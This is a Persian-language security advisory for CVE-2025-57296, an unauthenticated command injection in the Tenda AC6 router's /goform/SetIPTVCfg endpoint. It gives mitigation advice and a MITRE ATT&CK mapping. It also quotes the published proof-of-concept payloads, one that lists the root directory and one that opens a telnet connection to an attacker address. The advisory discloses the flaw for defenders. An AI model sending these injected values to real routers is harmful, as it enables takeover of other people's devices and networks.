- شناسه CVE-2025-57296 :CVE
- CWE-77 :CWE
- yes :Advisory
- منتشر شده: سپتامبر 19, 2025
- به روز شده: سپتامبر 19, 2025
- امتیاز: 6.5
- نوع حمله: Command Injection
- اثر گذاری: Arbitrary Commands Execution
- حوزه: تجهیزات شبکه و امنیت
- برند: Tenda
- محصول: AC6
- وضعیتPublished :CVE
- Yes :POC
- وضعیت آسیب پذیری: patch نشده
چکیده
آسیبپذیری در فریم ور روتر Tenda AC6 نسخه 15.03.05.19 به دلیل تزریق فرمان (Command Injection) در تابع formSetIptv و اندپوینت وب /goform/SetIPTVCfg است. این ضعف به مهاجمان امکان میدهد بدون احراز هویت، با ارسال درخواستهای POST مخرب و دستکاری پارامترهای list و vlanId، دستورات دلخواه سیستم را اجرا کرده و کنترل غیرمجاز دستگاه را به دست آورند.
توضیحات
آسیبپذیری CVE-2025-57296 در روتر Tenda AC6، یک روتر بیسیم مصرفی با پشتیبانی از IPTV، فایروال و multi-WAN، ناشی از عدم اعتبارسنجی پارامترهای list و vlanId در تابع formSetIptv است و مطابق با CWE-77 طبقهبندی میشود.
این ضعف در فریم ور نسخه 15.03.05.19 (AC6V1.0) وجود دارد و اندپوینت وب /goform/SetIPTVCfg (رابط HTTP برای تنظیمات IPTV) را تحت تأثیر قرار میدهد.
تابع formSetIptv درخواستهای POST را میگیرد و با یک تابع کمکی مقادیر list و vlanId را استخراج میکند؛ این مقادیر بیپاکسازی مستقیماً در دستور nvram set قرار میگیرند و توسط doSystemCmd اجرا میشوند. مهاجم میتواند با وارد کردن کاراکترهای خاص از محدوده نقلقولشده شِل خارج شود و فرمانهای دلخواه سیستم را اجرا کند.
این آسیبپذیری از طریق شبکه (در بیشتر مواقع شبکه داخلی) با پیچیدگی پایین و بدون نیاز به احراز هویت یا تعامل کاربر قابل بهرهبرداری است. مهاجم میتواند با ارسال درخواست POST مخرب، دستورات سیستم را اجرا کند. پیامدهای آن شامل نقض محدود محرمانگی با دسترسی به فایلهای حساس، یکپارچگی با تغییر تنظیمات روتر و امکان کنترل کامل دستگاه با اجرای دستورات دلخواه است.
کد اثبات مفهومی (PoC) منتشرشده به شرح زیر است:
- لیست کردن دایرکتوری روت (Root Directory Listing):
ارسال list=abc”; ls /” به اندپوینت /goform/SetIPTVCfg منجر به بازگشت محتویات دایرکتوری Root می شود.
- Reverse shell:
ارسال list=abc”; telnet 192.168.x.x 9999″ امکان برقراری اتصال به پورت مهاجم را فراهم می کند.
لازم به ذکر است که کوکی password احتمالا برای دسترسی اولیه لازم می باشد، اما آسیب پذیری به طور کلی بدون احراز هویت کامل نیز قابل بهرهبرداری است. تاکنون هیچ گونه پچ رسمی از سوی Tenda منتشر نشده است و کاربران باید منتظر بهروزرسانی فریم ور باشند.
CVSS
Score | Severity | Version | Vector String |
6.5 | MEDIUM | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
لیست محصولات آسیب پذیر
Versions | Product |
15.03.05.19 | AC6 |
استفاده محصول در ایران
در این جدول، تعداد صفحات ایندکسشده در گوگل با دامنه .ir که Tenda AC6را ذکر کرده اند، ثبت شده است. این داده صرفاً برای برآورد تقریبی حضور محصولات در وب ایران استفاده شده و نمایانگر میزان نصب دقیق و استفاده واقعی نیست.
Approx. Usage in .ir Domain via Google
(Total Pages) |
Product |
318 | Tenda AC6 |
نتیجه گیری
این آسیبپذیری در روتر Tenda AC6 با اینکه شدت متوسطی دارد اما به دلیل امکان تزریق فرمان سیستم بدون احراز هویت، تهدیدی قابل توجه برای امنیت شبکههای خانگی ایجاد میکند و میتواند منجر به اجرای دستورات دلخواه، دسترسی به فایلهای حساس یا کنترل کامل دستگاه شود. با توجه به عدم انتشار پچ رسمی، اجرای فوری اقدامات زیر برای کاهش ریسک ضروری است:
- بهروزرسانی فریم ور: سایت رسمی Tenda را به طور منظم بررسی کرده و به محض انتشار پچ امنیتی آن را نصب کنید.
- اعتبارسنجی ورودیها: در صورت امکان، از پروکسی یا فایروال برای فیلتر کردن درخواستهای POST به /goform/SetIPTVCfg و محدود کردن کاراکترهای خاص مانند ; و # استفاده کنید.
- محدودسازی دسترسی شبکه: دسترسی از راه دور به روتر را غیرفعال کرده و مدیریت دستگاه را تنها از طریق VPN و IPهای مجاز انجام دهید.
- نظارت بر ترافیک: لاگهای روتر را برای شناسایی درخواستهای مشکوک به SetIPTVCfg بررسی کرده و در صورت امکان از IDS/IPS برای شناسایی command injection بهره ببرید.
- تقویت امنیت داخلی دستگاه: رمز عبور پیشفرض را تغییر دهید، ویژگی IPTV را در صورت عدم نیاز غیرفعال کنید و از پروتکلهای امن برای دسترسی به روتر استفاده نمایید.
- جایگزینی دستگاه: در صورت عدم انتشار پچ رسمی، روتر را با مدلهای جدیدتر و امنتر جایگزین کنید.
- آموزش کاربران: مدیران شبکه را در مورد ریسک command injection آگاه کنید و بهروزرسانی منظم را الزامی سازید.
اجرای این اقدامات، ریسک بهرهبرداری از این آسیبپذیری را به حداقل رسانده و امنیت روتر Tenda AC6 را تا زمان انتشار پچ رسمی تقویت میکند. این آسیبپذیری بر اهمیت اعتبارسنجی ورودیها در اندپوینت های وب و بهروزرسانی منظم فریم ور در دستگاههای شبکهای تأکید دارد.
امکان استفاده در تاکتیک های Mitre Attack
Initial Access (TA0001)
اندپوینت وب /goform/SetIPTVCfg از طریق شبکه قابل دسترسی بوده و پارامترهای list, vlanId بدون پاکسازی پردازش میشوند؛ بهرهبرداری با پیچیدگی پایین و بدون نیاز به تعامل کاربر ممکن است. بسته به پیکربندی، ممکن است وجود کوکی /session مدیریتی لازم باشد؛ در هر صورت سوءاستفاده شبکهای و دسترسی ابتدایی به دستگاه فراهم میگردد.
Execution (TA0002)
مقادیر ورودی مستقیماً در فراخوانی nvram set و سپس در doSystemCmd جایگذاری و اجرا میشوند؛ مهاجم میتواند از طریق تزریق کاراکترهای شکافدهنده نقلقول (quote-breaking) فرمانهای شل دلخواه را اجرا کند و در نتیجه اجرای کد از راه دور (RCE) در کانتکست فرآیند وب/روتر رخ میدهد.
Persistence (TA0003)
مهاجم میتواند مقادیر nvram یا اسکریپتهایی را که در راهاندازی مجدد بارگذاری میشوند تغییر دهد تا دسترسی یا ابزار مخرب بهصورت پایدار باقی بماند (مثلاً قرار دادن دستوراتی که در بوت یا سرویسها اجرا شوند).
Privilege Escalation (TA0004)
در صورتیکه فرایندهای سیستم یا فراخوانیهای doSystemCmd با مجوزهای بالاتر مثلاً root اجرا شوند یا آسیبپذیری محلیِ دیگری وجود داشته باشد، اجرای دستور میتواند منجر به ارتقای امتیاز مهاجم به سطح سیستم /root گردد.
Defense Evasion (TA0005)
مهاجم توانایی حذف یا تغییر لاگها، دستکاری تنظیمات گزارشگیری یا تغییر مقادیر nvram مرتبط با مانیتورینگ را دارد تا شناسایی را دشوار سازد؛ همچنین میتواند مکانیزمهای تشخیص محلی را دور بزند یا فرآیندهای نظارتی را متوقف کند.
Credential Access (TA0006)
اجرای دستورات روی دستگاه این امکان را فراهم میکند که مهاجم فایلهای پیکربندی، فایلهای حاوی پسورد یا توکنها، و کلیدهای SSH محلی را بخواند و اعتبارنامههای ذخیرهشده در روتر را استخراج نماید.
Discovery (TA0007)
مهاجم میتواند با اجرای دستورات محلی اطلاعات شبکهای، پورتها، سرویسهای در حال اجرا و پیکربندیهای روتر مانند مسیرها، جدول NAT، لیستهای VLAN را شناسایی کند تا برد عملیات را برای حرکات بعدی تعیین نماید.
Lateral Movement (TA0008)
پس از استخراج اعتبارنامهها یا باز کردن کانالهای خروجی (reverse shell, telnet, SSH) ، مهاجم میتواند به میزبانهای دیگر در شبکه حرکت کند و سرویسهای داخلی یا دستگاههای متصل را هدف قرار دهد.
Collection (TA0009)
مهاجم قادر است دادههای حساس دستگاه و شبکه را جمعآوری کند — شامل بکاپها، فایلهای پیکربندی، لاگها و دادههای عبوری — و آنها را برای مراحل بعدی نگهداری نماید.
Exfiltration (TA0010)
دادههای جمعآوریشده میتوانند از طریق کانالهای شبکهای reverse shell, TCP/UDP, HTTP(S), DNS tunneling یا از طریق تغییرات در پیکربندی شبکه به خارج منتقل شوند؛ مهاجم میتواند دادهها را رمزنگاری یا با ترافیک مشروع ترکیب کند تا کشف را دشوار سازد.
Impact (TA0040)
پیامدها شامل اجرای کد از راه دور (RCE) در دستگاه، نقض محرمانگی و افشای دادهها، تغییر یا حذف پیکربندیها (نقض یکپارچگی)، و کاهش دسترسپذیری سرویسهای شبکه است؛ در بدترین حالت مهاجم میتواند کنترل کامل روتر و مسیر ترافیک شبکه را بهدست آورده و تهدیدی گسترده برای شبکه ایجاد کند.
منابع
- https://www.cve.org/CVERecord?id=CVE-2025-57296
- https://www.cvedetails.com/cve/CVE-2025-57296/
- https://github.com/ZZ2266/.github.io/tree/main/Tenda
- https://github.com/ZZ2266/.github.io/blob/main/Tenda/readme.md
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-57296
- https://vuldb.com/?id.325038
- https://cwe.mitre.org/data/definitions/77.html